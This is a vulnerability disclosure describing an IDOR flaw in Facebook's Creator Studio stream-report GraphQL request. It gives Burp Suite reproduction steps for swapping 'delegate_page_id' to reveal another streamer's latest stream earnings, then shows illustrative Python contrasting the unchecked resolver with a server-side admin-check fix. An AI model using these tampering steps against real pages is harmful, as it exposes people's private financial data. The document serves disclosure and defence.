Published On: 25 Mar 2021
In the Facebook gaming dashboard there is an option called "View Stream Report", where streamers can see information about their stream such as the title, description and tagged game. For more information see https://www.facebook.com/business/help/423354648152123?id=648321075955172
The POST request that handles this option is vulnerable to an IDOR bug in the parameter "delegate_page_id": by changing it, the caller can disclose the earnings of the latest live stream for any gaming streamer page.
This allows an attacker to disclose the latest stream video asset earnings of any gaming streamer page.
Step 1: From the attacker account
==================
1- Go to https://business.facebook.com/creatorstudio/home ==> Creative tools ==> Live dashboard
2- Go to the "Latest stream" box ==> start intercepting with Burp Suite ==> click on "View Stream Report"
You should see a POST request like the one below:
POST /api/graphql/ HTTP/1.1
Host: business.facebook.com
av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910
The vulnerable parameter is "delegate_page_id". Change its value to the page ID of any streamer page and forward the request to the server.
The response contains a lot of information about that streamer page, including the following private field:
- "latest_stream_video_asset_earnings":"money amount in number", for example:
"latest_stream_video_asset_earnings":"500.00"
which discloses the money amount earned by the page's latest stream video.
This information is private and should not be visible to anyone except the page admins.
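The root cause is that the server trusts the client-supplied "delegate_page_id" without checking that the calling user administers that page. The following is an added illustration, not Facebook's code: a minimal model of the stream-report resolver, showing the unchecked lookup beside a hardened version that only returns private fields to page admins. All page IDs, user IDs, field values and the PAGE_ADMINS lookup are constructed assumptions.

```python
# Added example (not Facebook's code): models the stream-report resolver
# behind "View Stream Report" with a page-admin check on delegate_page_id.
# All ids, pages and earnings values below are constructed sample data.

# Constructed fixture: which users administer which page.
PAGE_ADMINS = {
    "page_1001": {"user_alice"},
    "page_2002": {"user_bob"},
}

# Constructed fixture: the stored stream report per page. The earnings
# field is the one the write-up shows being leaked.
STREAM_REPORTS = {
    "page_1001": {"title": "Speedrun night", "tagged_game": "Example Quest",
                  "latest_stream_video_asset_earnings": "500.00"},
    "page_2002": {"title": "Ranked grind", "tagged_game": "Example Arena",
                  "latest_stream_video_asset_earnings": "120.50"},
}

# Fields that only page admins may see.
PRIVATE_FIELDS = {"latest_stream_video_asset_earnings"}


def is_page_admin(user_id, page_id):
    """Hypothetical authorization lookup: does user_id administer page_id?"""
    return user_id in PAGE_ADMINS.get(page_id, set())


def stream_report_vulnerable(user_id, delegate_page_id):
    """Mirrors the bug: delegate_page_id from the request is trusted as-is,
    so any authenticated user receives the full report of any page."""
    return dict(STREAM_REPORTS[delegate_page_id])


def stream_report_fixed(user_id, delegate_page_id):
    """Hardened: the caller's identity (from the session, never from the
    request body) is checked against the page before private fields are
    returned. Non-admins still get the public part of the report."""
    report = dict(STREAM_REPORTS[delegate_page_id])
    if not is_page_admin(user_id, delegate_page_id):
        # Strip private fields server-side; hiding them in the UI is not enough.
        for field in PRIVATE_FIELDS:
            report.pop(field, None)
    return report
```

The check must run on the server for every object-level field, because "delegate_page_id" (like "av" and "__user" in the captured request) is fully under the client's control.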